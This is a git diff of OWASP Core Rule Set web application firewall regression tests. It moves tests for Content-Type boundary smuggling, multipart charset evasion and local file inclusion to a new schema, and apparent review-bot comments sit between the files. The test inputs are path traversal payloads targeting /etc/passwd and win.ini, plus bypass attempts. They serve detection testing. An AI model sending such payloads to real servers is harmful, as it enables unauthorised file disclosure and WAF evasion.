"HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 
921422-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="text/xml" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921422] + - test_id: 4 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/xml" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/xml" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921422] + - test_id: 5 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="multipart/related" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="multipart/related" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921422] + - test_id: 6 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="text/html" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - 
test_title: 921422-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="text/html" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921422] + - test_id: 7 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="image/jpeg" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="image/jpeg" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921422] + - test_id: 8 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="foobar/foobar" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="foobar/foobar" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921422] + - test_id: 9 desc: Negative test for 921422-1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-10 + - input: + dest_addr: 127.0.0.1 + headers: + 
Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921422] + - test_id: 10 desc: Negative test for 921422-2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/vnd.mycompany.myapp.customer-v2+json - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/vnd.mycompany.myapp.customer-v2+json + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921422] + - test_id: 11 desc: Negative test for 921422-3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: text/xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: text/xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921422] + - test_id: 12 desc: Negative test for 921422-4 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921422] + - test_id: 13 desc: Negative test for 921422-5 stages: 
- - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/soap+xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/soap+xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921422] + - test_id: 14 desc: Negative test for 921422-6 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: text/html - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: text/html + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921422] + - test_id: 15 desc: Negative test for rule 921422-7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: text/html; charset=UTF-8 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: text/html; charset=UTF-8 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921422] + - test_id: 16 desc: Negative test for rule 921422-8 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=something - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - 
test_title: 921422-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=something + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921422] + - test_id: 17 desc: Negative test for rule 921422-9 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=----webkitformboundary12w4lszoxn26vnd - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=----webkitformboundary12w4lszoxn26vnd + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921422] diff --git a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml index f1eeae421..710fae5c3 100644 --- a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml +++ b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml 
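Review bot: Tests 3 through 8 on the new side all carry the identical `desc: Bypass targeting recommended rules (rule 200001)`, so a go-ftw failure report naming only the test_id gives no hint which mime type smuggled into the boundary parameter was under test; appending the probed value, e.g. `desc: Bypass targeting recommended rules (rule 200001), boundary="text/xml"`, makes each failure self-explanatory. The negative tests keep the old cross-reference style (`Negative test for 921422-1`), which still maps cleanly onto `test_id: 1`, but tests 15 to 17 say `for rule 921422-7` while tests 9 to 14 say `for 921422-1`; aligning the phrasing is a small consistency win while these lines are being rewritten anyway.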
@@ -2,90 +2,89 @@ meta: author: "Felipe Zipitria, Max Leske" description: Test Multipart/form-data - enabled: true - name: 922100.yaml +rule_id: 922100 tests: - - test_title: 922100-1 + - test_id: 1 desc: "Positive test: utf-7 is not in allowed charsets" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="_charset_" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="_charset_" - utf-7 - --boundary - Content-disposition: form-data; name="positive" - Content-Type: text/plain + utf-7 + --boundary + Content-disposition: form-data; name="positive" + Content-Type: text/plain - Let me see if I can use utf-7. - --boundary-- - output: - log_contains: id "922100" - - test_title: 922100-2 + Let me see if I can use utf-7. 
+ --boundary-- + output: + log: + expect_ids: [922100] + - test_id: 2 desc: "Negative test: only allowed charsets when using _charset_" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="_charset_" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="_charset_" - utf-8 - --boundary - Content-disposition: form-data; name="negative" - Content-Type: text/plain + utf-8 + --boundary + Content-disposition: form-data; name="negative" + Content-Type: text/plain - This should be good as we use utf-8 that is allowed. - --boundary-- - output: - no_log_contains: id "922100" - - test_title: 922100-3 + This should be good as we use utf-8 that is allowed. 
+ --boundary-- + output: + log: + no_expect_ids: [922100] + - test_id: 3 desc: "Positive test: don't allow substrings of valid charsets when using _charset_" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="_charset_" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="_charset_" - utf- - --boundary - Content-disposition: form-data; name="negative" - Content-Type: text/plain + utf- + --boundary + Content-disposition: form-data; name="negative" + Content-Type: text/plain - utf-8 is valid but utf- should not be. - --boundary-- - output: - log_contains: id "922100" + utf-8 is valid but utf- should not be. + --boundary-- + output: + log: + expect_ids: [922100] diff --git a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml index 72e8f269b..90b479f2f 100644 --- a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml +++ b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml 
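Review bot: In test 3 the multipart part is still named `negative` although the test is a positive case that expects 922100 to fire; renaming it `name="positive"`, as test 1 does, keeps the payload self-describing when someone reads the audit log. The `data: |` literal blocks keep the trailing newline after `--boundary--`, which a multipart body needs to terminate the closing delimiter, so that style choice should stay as written rather than being switched to `|-`.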
@@ -2,62 +2,61 @@ meta: author: "Felipe Zipitria" description: Test Multipart/form-data - enabled: true - name: 922110.yaml +rule_id: 922110 tests: - - test_title: 922110-1 + - test_id: 1 desc: "Positive test: utf-7 is not in allowed charsets" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="_charset_" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="_charset_" - utf-8 - --boundary - Content-disposition: form-data; name="922110" - Content-Type: text/plain; charset=utf-7 + utf-8 + --boundary + Content-disposition: form-data; name="922110" + Content-Type: text/plain; charset=utf-7 - Knock knock. - --boundary-- - output: - log_contains: id "922110" - - test_title: 922110-2 + Knock knock. 
+ --boundary-- + output: + log: + expect_ids: [922110] + - test_id: 2 desc: "Negative test: utf-8 is allowed" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="_charset_" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="_charset_" - utf-8 - --boundary - Content-disposition: form-data; name="negative" - Content-Type: text/plain; charset=utf-8 + utf-8 + --boundary + Content-disposition: form-data; name="negative" + Content-Type: text/plain; charset=utf-8 - I shold be allowed to get in. - --boundary-- - output: - no_log_contains: id "922110" + I shold be allowed to get in. + --boundary-- + output: + log: + no_expect_ids: [922110] diff --git a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml index 71e447a6f..fe49ae15b 100644 --- a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml +++ b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml 
@@ -2,55 +2,54 @@ meta: author: "Felipe Zipitria" description: Test Multipart/form-data - enabled: true - name: 922120.yaml +rule_id: 922120 tests: - - test_title: 922120-1 + - test_id: 1 desc: "Positive test: utf-7 is not in allowed charsets" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-Disposition: form-data; name="flavors" - Content-Transfer-Encoding: 8bit - Content-Type: text/plain; charset=utf-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-Disposition: form-data; name="flavors" + Content-Transfer-Encoding: 8bit + Content-Type: text/plain; charset=utf-7 - Pineapple. Pizza. - --boundary-- - output: - log_contains: id "922120" - - test_title: 922120-2 + Pineapple. Pizza. 
+ --boundary-- + output: + log: + expect_ids: [922120] + - test_id: 2 desc: "Negative test: no content-transfer-encoding header should be good" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="negative" - Content-Type: text/plain + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="negative" + Content-Type: text/plain - This should be good as there is no content-transfer-encoding header. - --boundary-- - output: - no_log_contains: id "922120" + This should be good as there is no content-transfer-encoding header. + --boundary-- + output: + log: + no_expect_ids: [922120] diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml index 276aa07f9..d9a96df21 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml 
@@ -1,73 +1,72 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - enabled: true - name: "930100.yaml" description: "Application attack LFI" +rule_id: 930100 tests: - - test_title: 930100-1 + - test_id: 1 desc: "Path Traversal Attack (/../) encoded" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - FoobarHeader: "0x5c0x2e.%00/" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930100" - - test_title: 930100-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + FoobarHeader: "0x5c0x2e.%00/" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930100] + - test_id: 2 desc: "Path Traversal Attack Triple Dot (/.../)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?foo=.../.../WINDOWS/win.ini" - version: "HTTP/1.1" - output: - log_contains: id "930100" - - test_title: 930100-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?foo=.../.../WINDOWS/win.ini" + version: "HTTP/1.1" + output: + log: + expect_ids: [930100] + - test_id: 3 desc: "Path Traversal Attack Triple Dot (/.../) encoded: foo=.../.../WINDOWS/win.ini" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - 
Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?foo=0x2e.%000x2f0x2e.%00/WINDOWS/win.ini" - version: "HTTP/1.1" - output: - log_contains: id "930100" - - test_title: 930100-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?foo=0x2e.%000x2f0x2e.%00/WINDOWS/win.ini" + version: "HTTP/1.1" + output: + log: + expect_ids: [930100] + - test_id: 4 desc: "Status Page Test - Path Traversal Attack (../), partially encoded" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - FoobarHeader: "0x5c0x2e./" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930100" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + FoobarHeader: "0x5c0x2e./" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930100] diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml index 2a0e587e7..65f94b99a 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml 
@@ -1,219 +1,220 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - enabled: true - name: "930110.yaml" description: "Application attacks: Local file include" +rule_id: 930110 tests: - - test_title: 930110-1 + - test_id: 1 desc: "Path Traversal Attack (/../)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - FoobarHeader: "/../../../././..\\ ../../etc/master.passwd" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + FoobarHeader: "/../../../././..\\ ../../etc/master.passwd" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930110] + - test_id: 2 desc: "Path Traversal Attack (/../) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - X-FTW: "This should trip" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?arg=../../../etc/passwd" - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-3 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + X-FTW: "This should trip" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?arg=../../../etc/passwd" + version: "HTTP/1.1" + output: + log: + expect_ids: [930110] + - test_id: 3 desc: "Path Traversal Attack (/../) query string" stages: - - 
stage: - input: - dest_addr: "localhost" - method: "POST" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "arg=../../../etc/passwd&foo=var" - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-4 + - input: + dest_addr: "localhost" + method: "POST" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "arg=../../../etc/passwd&foo=var" + version: "HTTP/1.1" + output: + log: + expect_ids: [930110] + - test_id: 4 desc: "Path Traversal Attack (/../) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/foo../1234" - version: "HTTP/1.1" - output: - no_log_contains: id "930110" - - test_title: 930110-5 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/foo../1234" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [930110] + - test_id: 5 desc: "Path Traversal Attack (/../) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/foo.../1234" - version: "HTTP/1.1" - output: - no_log_contains: id "930110" - - test_title: 930110-6 + - input: + dest_addr: "localhost" + method: 
"GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/foo.../1234" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [930110] + - test_id: 6 desc: "Path Traversal Attack (/../) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/..foo" - version: "HTTP/1.1" - output: - no_log_contains: id "930110" - - test_title: 930110-7 - desc: "Path Traversal Attack (/../) query string" + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/..foo" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [930110] + - test_id: 7 + desc: | + Path Traversal Attack (/../) query string. + Note: apparently, httpd strips dots, ModSecurity never sees them in `REQUEST_URI`` stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/.." - version: "HTTP/1.1" - output: - no_log_contains: id "930110" - - test_title: 930110-8 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/.." 
+ version: "HTTP/1.1" + output: + log: + no_expect_ids: [930110] + - test_id: 8 desc: 'Path Traversal Attack (..\) query string' stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: '/get?arg=..\pineapple' - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-9 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: '/get?arg=..\pineapple' + version: "HTTP/1.1" + output: + log: + expect_ids: [930110] + - test_id: 9 desc: 'Path Traversal Attack triple dot (.../) query string' stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: '/get?foo=.../.../WINDOWS/win.ini' - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-10 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: '/get?foo=.../.../WINDOWS/win.ini' + version: "HTTP/1.1" + output: + log: + expect_ids: [930110] + - test_id: 10 desc: 'Path Traversal Attack (../) file upload' stages: - - stage: - input: - dest_addr: "localhost" - method: "POST" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ - Accept: 
